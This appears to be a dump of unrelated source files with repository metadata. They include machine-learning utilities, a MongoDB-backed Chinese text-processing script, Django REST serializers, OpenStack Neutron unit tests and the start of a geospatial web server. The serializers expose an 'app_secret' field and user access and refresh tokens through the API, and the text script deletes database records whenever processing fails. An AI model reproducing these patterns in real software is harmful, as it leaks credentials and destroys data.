return solver.optimize(model, data, val_data)
###############################################################################
# MantraWithSSG
###############################################################################
class MantraWithSSG:
def __init__(self, lambdaa=1e-4, num_epochs=25, sample='perm', do_weighted_averaging=False, seed=1, verbose=1, show_debug_every=0):
self.lambdaa = lambdaa
self.num_epochs = num_epochs
self.sample = sample
self.do_weighted_averaging = do_weighted_averaging
self.seed = seed
self.verbose = verbose
self.show_debug_every = int(show_debug_every)
def optimize(self, model, data, val_data=None):
solver = SSGSolver(MantraLoss(), self.lambdaa, self.num_epochs, self.sample, self.do_weighted_averaging, self.seed, self.verbose, self.show_debug_every)
return solver.optimize(model, data, val_data)
| 29.966387
| 154
| 0.661526
|
9f1032b25a86a7922e2ba9f8bf85956e1680122c
| 922
|
py
|
Python
|
data_processing/cut_and_remove_stop_words.py
|
lvyufeng/cnki_h5_papers_auto_downloader
|
8b2f92cbee2f3de9afa3754ee971cdc60712310e
|
[
"MIT"
] | 2
|
2020-10-14T11:44:16.000Z
|
2021-08-30T13:43:30.000Z
|
data_processing/cut_and_remove_stop_words.py
|
lvyufeng/cnki_h5_papers_auto_downloader
|
8b2f92cbee2f3de9afa3754ee971cdc60712310e
|
[
"MIT"
] | null | null | null |
data_processing/cut_and_remove_stop_words.py
|
lvyufeng/cnki_h5_papers_auto_downloader
|
8b2f92cbee2f3de9afa3754ee971cdc60712310e
|
[
"MIT"
] | null | null | null |
import jieba
import pymongo
def stop_words_list():
stop_words = [line.strip() for line in open('stopword.txt','r+',encoding='UTF-8').readlines()]
return stop_words
def cut_words(sentence):
sentence_cut = jieba.cut(sentence.strip())
stop_words = stop_words_list()
output = ''
for word in sentence_cut:
if word not in stop_words:
output += word
output += ' '
return output
output_filename = 'abstracts.txt'
outputs = open(output_filename,'w+',encoding='UTF-8')
client = pymongo.MongoClient('202.202.5.140')
collection = client['cnki_papers']
db = collection['paper_detail']
for i in db.find():
try:
line = cut_words(i['a_abstract'].replace('\n摘 要:\n',''))
outputs.write(i['filename']+ '\t' + i['top-title'].strip() + '\t' + line + '\n')
except Exception as e:
print(i['filename'])
db.remove(i)
outputs.close()
| 23.641026
| 98
| 0.621475
|
a4b56c8a5c8c22471b9971824ea5601877f8a412
| 914
|
py
|
Python
|
DAEGC/utils.py
|
JLUVicent/DAEGC
|
9a4cc50e40e8521fafb00960d1adf8216674c8f6
|
[
"MIT"
] | 32
|
2021-03-26T13:15:34.000Z
|
2022-03-14T06:07:57.000Z
|
DAEGC/utils.py
|
JLUVicent/DAEGC
|
9a4cc50e40e8521fafb00960d1adf8216674c8f6
|
[
"MIT"
] | 3
|
2021-06-05T12:06:57.000Z
|
2021-12-10T03:09:20.000Z
|
DAEGC/utils.py
|
JLUVicent/DAEGC
|
9a4cc50e40e8521fafb00960d1adf8216674c8f6
|
[
"MIT"
] | 8
|
2021-04-25T01:32:22.000Z
|
2022-03-30T08:16:20.000Z
|
import numpy as np
import torch
from sklearn.preprocessing import normalize
from torch_geometric.datasets import Planetoid
def get_dataset(dataset):
datasets = Planetoid('./dataset', dataset)
return datasets
def data_preprocessing(dataset):
dataset.adj = torch.sparse_coo_tensor(
dataset.edge_index, torch.ones(dataset.edge_index.shape[1]), torch.Size([dataset.x.shape[0], dataset.x.shape[0]])
).to_dense()
dataset.adj_label = dataset.adj
dataset.adj += torch.eye(dataset.x.shape[0])
dataset.adj = normalize(dataset.adj, norm="l1")
dataset.adj = torch.from_numpy(dataset.adj).to(dtype=torch.float)
return dataset
def get_M(adj):
adj_numpy = adj.cpu().numpy()
# t_order
t=2
tran_prob = normalize(adj_numpy, norm="l1", axis=0)
M_numpy = sum([np.linalg.matrix_power(tran_prob, i) for i in range(1, t + 1)]) / t
return torch.Tensor(M_numpy)
| 27.69697
| 121
| 0.702407
|
081b3b75dd2cf5d1e7ea32e0173a33362e465e5b
| 2,173
|
py
|
Python
|
coogger/cooggerapi/serializers.py
|
adilkhan8000/coogger
|
0d9350116bec29c0c4f5229118e4045c9e64d796
|
[
"MIT"
] | null | null | null |
coogger/cooggerapi/serializers.py
|
adilkhan8000/coogger
|
0d9350116bec29c0c4f5229118e4045c9e64d796
|
[
"MIT"
] | null | null | null |
coogger/cooggerapi/serializers.py
|
adilkhan8000/coogger
|
0d9350116bec29c0c4f5229118e4045c9e64d796
|
[
"MIT"
] | null | null | null |
from rest_framework import serializers
# models
from cooggerapp.models import (
Content, OtherInformationOfUsers,
SearchedWords, UserFollow)
from django_steemconnect.models import SteemConnectUser, Community
class SearchedWordsSerializer(serializers.ModelSerializer):
class Meta:
model = SearchedWords
fields = ("word", "hmany")
class UserFollowSerializer(serializers.ModelSerializer):
class Meta:
model = UserFollow
fields = ("username", "choices", "adress")
class CommunitySerializer(serializers.ModelSerializer):
class Meta:
model = Community
fields = ("name", "host_name", "redirect_url",
"client_id", "app_secret", "login_redirect",
"scope", "icon_address", "ms", "management_user", "management","active")
class SteemConnectUserSerializer(serializers.ModelSerializer):
class Meta:
model = SteemConnectUser
fields = (
'user',
"username",
"access_token",
"refresh_token",
"code",
"community",
"community_name"
)
class UserSerializer(serializers.ModelSerializer):
class Meta:
model = OtherInformationOfUsers
fields = (
"user",
'username',
"about",
"cooggerup_confirmation",
"cooggerup_percent",
"vote_percent",
"beneficiaries",
"sponsor",
"total_votes",
"total_vote_value",
)
class ContentsSerializer(serializers.ModelSerializer):
class Meta:
model = Content
fields = (
"community",
"community_name",
"user",
'username',
'title',
'permlink',
'content',
"tag",
"category",
"language",
"definition",
"topic",
"status",
"time",
"dor",
"views",
"read",
"lastmod",
"mod",
"modusername",
"cooggerup",
)
| 23.619565
| 90
| 0.525541
|
44a686e61455375dc99ff3ab4de0ba790454f6ea
| 24,431
|
py
|
Python
|
neutron/tests/unit/ml2/drivers/test_l2population.py
|
plumgrid/plumgrid-quantum
|
dbd7e472ca28d22d694eeeba47e0738985583961
|
[
"Apache-2.0"
] | 1
|
2016-04-23T21:33:31.000Z
|
2016-04-23T21:33:31.000Z
|
neutron/tests/unit/ml2/drivers/test_l2population.py
|
plumgrid/plumgrid-quantum
|
dbd7e472ca28d22d694eeeba47e0738985583961
|
[
"Apache-2.0"
] | null | null | null |
neutron/tests/unit/ml2/drivers/test_l2population.py
|
plumgrid/plumgrid-quantum
|
dbd7e472ca28d22d694eeeba47e0738985583961
|
[
"Apache-2.0"
] | 4
|
2015-04-14T10:06:51.000Z
|
2019-10-02T01:28:34.000Z
|
# Copyright (c) 2013 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# @author: Sylvain Afchain, eNovance SAS
# @author: Francois Eleouet, Orange
# @author: Mathieu Rohon, Orange
import mock
from neutron.common import constants
from neutron.common import topics
from neutron import context
from neutron.db import agents_db
from neutron.db import api as db_api
from neutron.extensions import portbindings
from neutron.extensions import providernet as pnet
from neutron import manager
from neutron.openstack.common import timeutils
from neutron.plugins.ml2 import config as config
from neutron.plugins.ml2.drivers.l2pop import constants as l2_consts
from neutron.plugins.ml2 import managers
from neutron.plugins.ml2 import rpc
from neutron.tests.unit import test_db_plugin as test_plugin
HOST = 'my_l2_host'
L2_AGENT = {
'binary': 'neutron-openvswitch-agent',
'host': HOST,
'topic': constants.L2_AGENT_TOPIC,
'configurations': {'tunneling_ip': '20.0.0.1',
'tunnel_types': ['vxlan']},
'agent_type': constants.AGENT_TYPE_OVS,
'tunnel_type': [],
'start_flag': True
}
L2_AGENT_2 = {
'binary': 'neutron-openvswitch-agent',
'host': HOST + '_2',
'topic': constants.L2_AGENT_TOPIC,
'configurations': {'tunneling_ip': '20.0.0.2',
'tunnel_types': ['vxlan']},
'agent_type': constants.AGENT_TYPE_OVS,
'tunnel_type': [],
'start_flag': True
}
L2_AGENT_3 = {
'binary': 'neutron-openvswitch-agent',
'host': HOST + '_3',
'topic': constants.L2_AGENT_TOPIC,
'configurations': {'tunneling_ip': '20.0.0.2',
'tunnel_types': []},
'agent_type': constants.AGENT_TYPE_OVS,
'tunnel_type': [],
'start_flag': True
}
PLUGIN_NAME = 'neutron.plugins.ml2.plugin.Ml2Plugin'
NOTIFIER = 'neutron.plugins.ml2.rpc.AgentNotifierApi'
class TestL2PopulationRpcTestCase(test_plugin.NeutronDbPluginV2TestCase):
def setUp(self):
# Enable the test mechanism driver to ensure that
# we can successfully call through to all mechanism
# driver apis.
config.cfg.CONF.set_override('mechanism_drivers',
['openvswitch', 'linuxbridge',
'l2population'],
'ml2')
super(TestL2PopulationRpcTestCase, self).setUp(PLUGIN_NAME)
self.addCleanup(config.cfg.CONF.reset)
self.adminContext = context.get_admin_context()
self.type_manager = managers.TypeManager()
self.notifier = rpc.AgentNotifierApi(topics.AGENT)
self.callbacks = rpc.RpcCallbacks(self.notifier, self.type_manager)
self.orig_supported_agents = l2_consts.SUPPORTED_AGENT_TYPES
l2_consts.SUPPORTED_AGENT_TYPES = [constants.AGENT_TYPE_OVS]
net_arg = {pnet.NETWORK_TYPE: 'vxlan',
pnet.SEGMENTATION_ID: '1'}
self._network = self._make_network(self.fmt, 'net1', True,
arg_list=(pnet.NETWORK_TYPE,
pnet.SEGMENTATION_ID,),
**net_arg)
notifier_patch = mock.patch(NOTIFIER)
notifier_patch.start()
self.fanout_topic = topics.get_topic_name(topics.AGENT,
topics.L2POPULATION,
topics.UPDATE)
fanout = ('neutron.openstack.common.rpc.proxy.RpcProxy.fanout_cast')
fanout_patch = mock.patch(fanout)
self.mock_fanout = fanout_patch.start()
cast = ('neutron.openstack.common.rpc.proxy.RpcProxy.cast')
cast_patch = mock.patch(cast)
self.mock_cast = cast_patch.start()
uptime = ('neutron.plugins.ml2.drivers.l2pop.db.L2populationDbMixin.'
'get_agent_uptime')
uptime_patch = mock.patch(uptime, return_value=190)
uptime_patch.start()
self.addCleanup(mock.patch.stopall)
self.addCleanup(db_api.clear_db)
def tearDown(self):
l2_consts.SUPPORTED_AGENT_TYPES = self.orig_supported_agents
super(TestL2PopulationRpcTestCase, self).tearDown()
def _register_ml2_agents(self):
callback = agents_db.AgentExtRpcCallback()
callback.report_state(self.adminContext,
agent_state={'agent_state': L2_AGENT},
time=timeutils.strtime())
callback.report_state(self.adminContext,
agent_state={'agent_state': L2_AGENT_2},
time=timeutils.strtime())
callback.report_state(self.adminContext,
agent_state={'agent_state': L2_AGENT_3},
time=timeutils.strtime())
def test_fdb_add_called(self):
self._register_ml2_agents()
with self.subnet(network=self._network) as subnet:
host_arg = {portbindings.HOST_ID: HOST}
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg) as port1:
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg):
p1 = port1['port']
device = 'tap' + p1['id']
self.mock_fanout.reset_mock()
self.callbacks.update_device_up(self.adminContext,
agent_id=HOST,
device=device)
p1_ips = [p['ip_address'] for p in p1['fixed_ips']]
expected = {'args':
{'fdb_entries':
{p1['network_id']:
{'ports':
{'20.0.0.1': [[p1['mac_address'],
p1_ips[0]]]},
'network_type': 'vxlan',
'segment_id': 1}}},
'namespace': None,
'method': 'add_fdb_entries'}
self.mock_fanout.assert_called_with(
mock.ANY, expected, topic=self.fanout_topic)
def test_fdb_add_not_called_type_local(self):
self._register_ml2_agents()
with self.subnet(network=self._network) as subnet:
host_arg = {portbindings.HOST_ID: HOST + '_3'}
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg) as port1:
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg):
p1 = port1['port']
device = 'tap' + p1['id']
self.mock_fanout.reset_mock()
self.callbacks.update_device_up(self.adminContext,
agent_id=HOST,
device=device)
self.assertFalse(self.mock_fanout.called)
def test_fdb_add_two_agents(self):
self._register_ml2_agents()
with self.subnet(network=self._network) as subnet:
host_arg = {portbindings.HOST_ID: HOST,
'admin_state_up': True}
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID, 'admin_state_up',),
**host_arg) as port1:
host_arg = {portbindings.HOST_ID: HOST + '_2',
'admin_state_up': True}
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,
'admin_state_up',),
**host_arg) as port2:
p1 = port1['port']
p2 = port2['port']
device = 'tap' + p1['id']
self.mock_cast.reset_mock()
self.mock_fanout.reset_mock()
self.callbacks.update_device_up(self.adminContext,
agent_id=HOST,
device=device)
p1_ips = [p['ip_address'] for p in p1['fixed_ips']]
p2_ips = [p['ip_address'] for p in p2['fixed_ips']]
expected1 = {'args':
{'fdb_entries':
{p1['network_id']:
{'ports':
{'20.0.0.2': [constants.FLOODING_ENTRY,
[p2['mac_address'],
p2_ips[0]]]},
'network_type': 'vxlan',
'segment_id': 1}}},
'namespace': None,
'method': 'add_fdb_entries'}
topic = topics.get_topic_name(topics.AGENT,
topics.L2POPULATION,
topics.UPDATE,
HOST)
self.mock_cast.assert_called_with(mock.ANY,
expected1,
topic=topic)
expected2 = {'args':
{'fdb_entries':
{p1['network_id']:
{'ports':
{'20.0.0.1': [constants.FLOODING_ENTRY,
[p1['mac_address'],
p1_ips[0]]]},
'network_type': 'vxlan',
'segment_id': 1}}},
'namespace': None,
'method': 'add_fdb_entries'}
self.mock_fanout.assert_called_with(
mock.ANY, expected2, topic=self.fanout_topic)
def test_fdb_add_called_two_networks(self):
self._register_ml2_agents()
with self.subnet(network=self._network) as subnet:
host_arg = {portbindings.HOST_ID: HOST + '_2'}
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg) as port1:
with self.subnet(cidr='10.1.0.0/24') as subnet2:
with self.port(subnet=subnet2,
arg_list=(portbindings.HOST_ID,),
**host_arg):
host_arg = {portbindings.HOST_ID: HOST}
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg) as port3:
p1 = port1['port']
p3 = port3['port']
device = 'tap' + p3['id']
self.mock_cast.reset_mock()
self.mock_fanout.reset_mock()
self.callbacks.update_device_up(
self.adminContext, agent_id=HOST,
device=device)
p1_ips = [p['ip_address']
for p in p1['fixed_ips']]
expected1 = {'args':
{'fdb_entries':
{p1['network_id']:
{'ports':
{'20.0.0.2':
[constants.FLOODING_ENTRY,
[p1['mac_address'],
p1_ips[0]]]},
'network_type': 'vxlan',
'segment_id': 1}}},
'namespace': None,
'method': 'add_fdb_entries'}
topic = topics.get_topic_name(topics.AGENT,
topics.L2POPULATION,
topics.UPDATE,
HOST)
self.mock_cast.assert_called_with(mock.ANY,
expected1,
topic=topic)
p3_ips = [p['ip_address']
for p in p3['fixed_ips']]
expected2 = {'args':
{'fdb_entries':
{p1['network_id']:
{'ports':
{'20.0.0.1':
[constants.FLOODING_ENTRY,
[p3['mac_address'],
p3_ips[0]]]},
'network_type': 'vxlan',
'segment_id': 1}}},
'namespace': None,
'method': 'add_fdb_entries'}
self.mock_fanout.assert_called_with(
mock.ANY, expected2,
topic=self.fanout_topic)
def test_fdb_remove_called_from_rpc(self):
self._register_ml2_agents()
with self.subnet(network=self._network) as subnet:
host_arg = {portbindings.HOST_ID: HOST}
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg):
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg) as port:
p1 = port['port']
device = 'tap' + p1['id']
self.mock_fanout.reset_mock()
self.callbacks.update_device_up(self.adminContext,
agent_id=HOST,
device=device)
self.callbacks.update_device_down(self.adminContext,
agent_id=HOST,
device=device)
p1_ips = [p['ip_address'] for p in p1['fixed_ips']]
expected = {'args':
{'fdb_entries':
{p1['network_id']:
{'ports':
{'20.0.0.1': [[p1['mac_address'],
p1_ips[0]]]},
'network_type': 'vxlan',
'segment_id': 1}}},
'namespace': None,
'method': 'remove_fdb_entries'}
self.mock_fanout.assert_called_with(
mock.ANY, expected, topic=self.fanout_topic)
def test_fdb_remove_called(self):
self._register_ml2_agents()
with self.subnet(network=self._network) as subnet:
host_arg = {portbindings.HOST_ID: HOST}
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg):
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg) as port:
p1 = port['port']
device = 'tap' + p1['id']
self.mock_fanout.reset_mock()
self.callbacks.update_device_up(self.adminContext,
agent_id=HOST,
device=device)
p1_ips = [p['ip_address'] for p in p1['fixed_ips']]
expected = {'args':
{'fdb_entries':
{p1['network_id']:
{'ports':
{'20.0.0.1': [[p1['mac_address'],
p1_ips[0]]]},
'network_type': 'vxlan',
'segment_id': 1}}},
'namespace': None,
'method': 'remove_fdb_entries'}
self.mock_fanout.assert_any_call(
mock.ANY, expected, topic=self.fanout_topic)
def test_fdb_remove_called_last_port(self):
self._register_ml2_agents()
with self.subnet(network=self._network) as subnet:
host_arg = {portbindings.HOST_ID: HOST}
with self.port(subnet=subnet,
arg_list=(portbindings.HOST_ID,),
**host_arg) as port:
p1 = port['port']
device = 'tap' + p1['id']
self.callbacks.update_device_up(self.adminContext,
agent_id=HOST,
device=device)
p1_ips = [p['ip_address'] for p in p1['fixed_ips']]
expected = {'args':
{'fdb_entries':
{p1['network_id']:
{'ports':
{'20.0.0.1': [constants.FLOODING_ENTRY,
[p1['mac_address'],
p1_ips[0]]]},
'network_type': 'vxlan',
'segment_id': 1}}},
'namespace': None,
'method': 'remove_fdb_entries'}
self.mock_fanout.assert_any_call(
mock.ANY, expected, topic=self.fanout_topic)
def test_fixed_ips_changed(self):
self._register_ml2_agents()
with self.subnet(network=self._network) as subnet:
host_arg = {portbindings.HOST_ID: HOST}
with self.port(subnet=subnet, cidr='10.0.0.0/24',
arg_list=(portbindings.HOST_ID,),
**host_arg) as port1:
p1 = port1['port']
device = 'tap' + p1['id']
self.callbacks.update_device_up(self.adminContext,
agent_id=HOST,
device=device)
self.mock_fanout.reset_mock()
data = {'port': {'fixed_ips': [{'ip_address': '10.0.0.2'},
{'ip_address': '10.0.0.10'}]}}
req = self.new_update_request('ports', data, p1['id'])
res = self.deserialize(self.fmt, req.get_response(self.api))
ips = res['port']['fixed_ips']
self.assertEqual(len(ips), 2)
add_expected = {'args':
{'fdb_entries':
{'chg_ip':
{p1['network_id']:
{'20.0.0.1':
{'after': [[p1['mac_address'],
'10.0.0.10']]}}}}},
'namespace': None,
'method': 'update_fdb_entries'}
self.mock_fanout.assert_any_call(
mock.ANY, add_expected, topic=self.fanout_topic)
self.mock_fanout.reset_mock()
data = {'port': {'fixed_ips': [{'ip_address': '10.0.0.2'},
{'ip_address': '10.0.0.16'}]}}
req = self.new_update_request('ports', data, p1['id'])
res = self.deserialize(self.fmt, req.get_response(self.api))
ips = res['port']['fixed_ips']
self.assertEqual(len(ips), 2)
upd_expected = {'args':
{'fdb_entries':
{'chg_ip':
{p1['network_id']:
{'20.0.0.1':
{'before': [[p1['mac_address'],
'10.0.0.10']],
'after': [[p1['mac_address'],
'10.0.0.16']]}}}}},
'namespace': None,
'method': 'update_fdb_entries'}
self.mock_fanout.assert_any_call(
mock.ANY, upd_expected, topic=self.fanout_topic)
self.mock_fanout.reset_mock()
data = {'port': {'fixed_ips': [{'ip_address': '10.0.0.16'}]}}
req = self.new_update_request('ports', data, p1['id'])
res = self.deserialize(self.fmt, req.get_response(self.api))
ips = res['port']['fixed_ips']
self.assertEqual(len(ips), 1)
del_expected = {'args':
{'fdb_entries':
{'chg_ip':
{p1['network_id']:
{'20.0.0.1':
{'before': [[p1['mac_address'],
'10.0.0.2']]}}}}},
'namespace': None,
'method': 'update_fdb_entries'}
self.mock_fanout.assert_any_call(
mock.ANY, del_expected, topic=self.fanout_topic)
def test_no_fdb_updates_without_port_updates(self):
self._register_ml2_agents()
with self.subnet(network=self._network) as subnet:
host_arg = {portbindings.HOST_ID: HOST}
with self.port(subnet=subnet, cidr='10.0.0.0/24',
arg_list=(portbindings.HOST_ID,),
**host_arg) as port1:
p1 = port1['port']
device = 'tap' + p1['id']
self.callbacks.update_device_up(self.adminContext,
agent_id=HOST,
device=device)
p1['status'] = 'ACTIVE'
self.mock_fanout.reset_mock()
fanout = ('neutron.plugins.ml2.drivers.l2pop.rpc.'
'L2populationAgentNotifyAPI._notification_fanout')
fanout_patch = mock.patch(fanout)
mock_fanout = fanout_patch.start()
plugin = manager.NeutronManager.get_plugin()
plugin.update_port(self.adminContext, p1['id'], port1)
self.assertFalse(mock_fanout.called)
fanout_patch.stop()
| 44.179024
| 78
| 0.430396
|
9a7838d1958e4033bd7742faeb1993b416a6a815
| 601
|
py
|
Python
|
algorithms/symmetric_tree.py
|
kainonly/leetcode
|
83a84ad48d517eb7f1377cb2a3aa3fe763da6627
|
[
"MIT"
] | null | null | null |
algorithms/symmetric_tree.py
|
kainonly/leetcode
|
83a84ad48d517eb7f1377cb2a3aa3fe763da6627
|
[
"MIT"
] | null | null | null |
algorithms/symmetric_tree.py
|
kainonly/leetcode
|
83a84ad48d517eb7f1377cb2a3aa3fe763da6627
|
[
"MIT"
] | null | null | null |
# Definition for a binary tree node.
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def isSymmetric(self, root: TreeNode) -> bool:
def isSame(node1: TreeNode, node2: TreeNode):
if not node1 and not node2:
return True
if not node1 or not node2:
return False
return node1.val == node2.val and isSame(node1.left, node2.right) and isSame(node1.right, node2.left)
return isSame(root.left, root.right)
| 31.631579
| 113
| 0.605657
|
bba6b30d93593ff8a33d70cad5d3127a62a6dd4c
| 349,512
|
py
|
Python
|
ogc_server.py
|
timebackzhou/ogc_server
|
3355ebfafa4075e700bc9d55dbc727adc3626f09
|
[
"MIT"
] | null | null | null |
ogc_server.py
|
timebackzhou/ogc_server
|
3355ebfafa4075e700bc9d55dbc727adc3626f09
|
[
"MIT"
] | null | null | null |
ogc_server.py
|
timebackzhou/ogc_server
|
3355ebfafa4075e700bc9d55dbc727adc3626f09
|
[
"MIT"
] | 1
|
2019-09-16T14:02:28.000Z
|
2019-09-16T14:02:28.000Z
|
# -*- coding: utf-8 -*-
import codecs
import os, sys
import copy
import random
import json
import math
import decimal
import datetime
import threading
import exceptions
import time
import base64
import md5
from gevent import socket
import urllib, urllib2, urlparse
from socket import error
import errno
import subprocess
from multiprocessing import Process, Queue, current_process, freeze_support
import shutil
import re
#from PIL import Image
import StringIO
import cgi
import uuid
import copy
from contextlib import contextmanager
from gevent import pywsgi
import gevent
import gevent.fileobject
from gevent.local import local
from gevent.subprocess import check_output
import pymongo
import gridfs
from bson.objectid import ObjectId
try:
from geventhttpclient import HTTPClient, URL
except:
print('geventhttpclient import error')
try:
import geventwebsocket
from geventwebsocket.handler import WebSocketHandler
except:
print('geventwebsocket import error')
# try:
# from pysimplesoap.server import SoapDispatcher, WSGISOAPHandler
# from pysimplesoap.client import SoapClient, SoapFault
# except:
# print('pysimplesoap import error')
try:
from PIL import Image
except :
print('PIL import error')
try:
from lxml import etree
except:
print('lxml import error')
try:
import czml
except:
print('czml import error')
try:
from py3o.template import Template
except:
print('import py3o.template error')
import werkzeug
from werkzeug.wrappers import Request, BaseResponse
from werkzeug.local import LocalProxy
from werkzeug.contrib.sessions import FilesystemSessionStore
from werkzeug.utils import dump_cookie, parse_cookie
from werkzeug.routing import Map, Rule, BaseConverter, ValidationError, HTTPException
from sessions import MongoClient, MongodbSessionStore
import configobj
import db_util
import bayes_util
from module_locator import module_path, dec, dec1, enc, enc1
ENCODING = None
ENCODING1 = None
STATICRESOURCE_DIR = None
STATICRESOURCE_CSS_DIR = None
STATICRESOURCE_JS_DIR = None
STATICRESOURCE_IMG_DIR = None
UPLOAD_PHOTOS_DIR = None
UPLOAD_VOICE_DIR = None
gConfig = None
gStaticCache = {}
gTileCache = {}
#deprecated
gSatTileCache = {}
gMapTileCache = {}
gTerrainCache = {}
gGreenlets = {}
gClusterProcess = {}
gLoginToken = {}
gSecurityConfig = {}
gWebSocketsMap = {}
gTcpReconnectCounter = 0
gTcpSock = None
gHttpClient = {}
gFormTemplate = []
_SPECIAL = re.escape('()<>@,;:\\"/[]?={} \t')
_RE_SPECIAL = re.compile('[%s]' % _SPECIAL)
_QSTR = '"(?:\\\\.|[^"])*"' # Quoted string
_VALUE = '(?:[^%s]+|%s)' % (_SPECIAL, _QSTR) # Save or quoted string
_OPTION = '(?:;|^)\s*([^%s]+)\s*=\s*(%s)' % (_SPECIAL, _VALUE)
_RE_OPTION = re.compile(_OPTION) # key=value part of an Content-Type like header
gSessionStore = None
gRequests = None
gRequest = None
gProxyRequest = None
gJoinableQueue = None
class BooleanConverter(BaseConverter):
def __init__(self, url_map, randomify=False):
super(BooleanConverter, self).__init__(url_map)
self.regex = '(?:true|false)'
def to_python(self, value):
return value == 'true'
def to_url(self, value):
return value and 'true' or 'false'
class Py3oItem(object):
pass
gUrlMap = Map([
Rule('/', endpoint='firstaccess'),
Rule('/websocket', endpoint='handle_websocket'),
#Rule('/auth_check/<username>/isnew/<bool:isnew>', endpoint='saveuser'),
Rule('/get_salt', endpoint='get_salt'),
Rule('/auth_check/<username>', endpoint='auth_check'),
Rule('/auth_check', endpoint='auth_check'),
Rule('/register/<username>/<password>', endpoint='user_add'),
Rule('/register/<username>', endpoint='user_add'),
Rule('/register', endpoint='user_add'),
Rule('/unregister/<username>', endpoint='user_delete'),
Rule('/unregister', endpoint='user_delete'),
Rule('/login/<username>/<password>', endpoint='login'),
Rule('/login/<username>', endpoint='login'),
Rule('/login', endpoint='login'),
Rule('/logout', endpoint='logout'),
Rule('/reset_password/<username>/<password>', endpoint='reset_password'),
Rule('/reset_password/<username>', endpoint='reset_password'),
Rule('/reset_password', endpoint='reset_password'),
Rule('/user_check', endpoint='user_check'),
Rule('/user_query', endpoint='user_query'),
Rule('/user_update', endpoint='user_update'),
Rule('/function_add', endpoint='function_add'),
Rule('/function_query', endpoint='function_query'),
Rule('/function_update', endpoint='function_update'),
Rule('/function_delete', endpoint='function_delete'),
Rule('/role_add', endpoint='role_add'),
Rule('/role_update', endpoint='role_update'),
Rule('/role_query', endpoint='role_query'),
Rule('/role_delete', endpoint='role_delete'),
Rule('/role_template_save', endpoint='role_template_save'),
Rule('/role_template_get', endpoint='role_template_get'),
Rule('/workflow_add', endpoint='workflow_add'),
Rule('/workflow_query', endpoint='workflow_query'),
Rule('/workflow_query/<_id>', endpoint='workflow_query'),
Rule('/workflow_update', endpoint='workflow_update'),
Rule('/workflow_delete', endpoint='workflow_delete'),
Rule('/workflow_delete/<_id>', endpoint='workflow_delete'),
Rule('/workflow_template_add', endpoint='workflow_template_add'),
Rule('/workflow_template_query', endpoint='workflow_template_query'),
Rule('/workflow_template_query/<_id>', endpoint='workflow_template_query'),
Rule('/workflow_template_update', endpoint='workflow_template_update'),
Rule('/workflow_template_delete', endpoint='workflow_template_delete'),
Rule('/workflow_template_delete/<_id>', endpoint='workflow_template_delete'),
Rule('/workflow_form_fill', endpoint='workflow_form_fill'),
Rule('/workflow_form_blank', endpoint='workflow_form_blank'),
Rule('/user_add', endpoint='user_add'),
Rule('/user_get', endpoint='user_get'),
Rule('/all_user_get', endpoint='all_user_get'),
Rule('/user_remove', endpoint='user_remove'),
Rule('/group_add', endpoint='group_add'),
Rule('/group_get', endpoint='group_get'),
Rule('/group_update', endpoint='group_update'),
Rule('/group_remove', endpoint='group_remove'),
Rule('/user_group_get', endpoint='user_group_get'),
Rule('/user_contact_get', endpoint='user_contact_get'),
Rule('/chat_broadcast', endpoint='chat_broadcast'),
Rule('/chat_log_query', endpoint='chat_log_query'),
Rule('/chat_log_remove', endpoint='chat_log_remove'),
Rule('/gridfs/upload', endpoint='gridfs_upload'),
Rule('/gridfs/get', endpoint='gridfs_get'),
Rule('/gridfs/get/<_id>', endpoint='gridfs_get'),
Rule('/gridfs/get/<_id>/thumbnail/<width>/<height>', endpoint='gridfs_get'),
Rule('/gridfs/query/<width>/<height>', endpoint='gridfs_query'),
Rule('/gridfs/query/<width>/<height>/<limit>', endpoint='gridfs_query'),
Rule('/gridfs/query/<width>/<height>/<limit>/<skip>', endpoint='gridfs_query'),
Rule('/gridfs/delete', endpoint='gridfs_delete'),
Rule('/gridfs/delete/<_id>', endpoint='gridfs_delete'),
Rule('/antibird/get_equip_list', endpoint='get_equip_list'),
Rule('/antibird/get_latest_records_by_imei', endpoint='get_latest_records_by_imei'),
Rule('/antibird/equip_tower_mapping', endpoint='equip_tower_mapping'),
Rule('/state_examination/save', endpoint='state_examination_save'),
Rule('/state_examination/query', endpoint='state_examination_query'),
Rule('/state_examination/query/line_names', endpoint='state_examination_query_line_names'),
Rule('/state_examination/delete', endpoint='state_examination_delete'),
Rule('/state_examination/delete/<_id>', endpoint='state_examination_delete'),
Rule('/bayesian/query/graphiz', endpoint='bayesian_query_graphiz'),
Rule('/bayesian/query/node', endpoint='bayesian_query_node'),
Rule('/bayesian/query/predict', endpoint='bayesian_query_predict'),
Rule('/bayesian/save/node', endpoint='bayesian_save_node'),
Rule('/bayesian/delete/node', endpoint='bayesian_delete_node'),
Rule('/bayesian/delete/node/<_id>', endpoint='bayesian_delete_node'),
Rule('/bayesian/query/domains_range', endpoint='bayesian_query_domains_range'),
Rule('/bayesian/save/domains_range', endpoint='bayesian_save_domains_range'),
Rule('/bayesian/delete/domains_range', endpoint='bayesian_delete_domains_range'),
Rule('/bayesian/delete/domains_range/<_id>', endpoint='bayesian_delete_domains_range'),
Rule('/bayesian/reset/unit', endpoint='bayesian_reset_unit'),
], converters={'bool': BooleanConverter})
@contextmanager
def session_manager(environ):
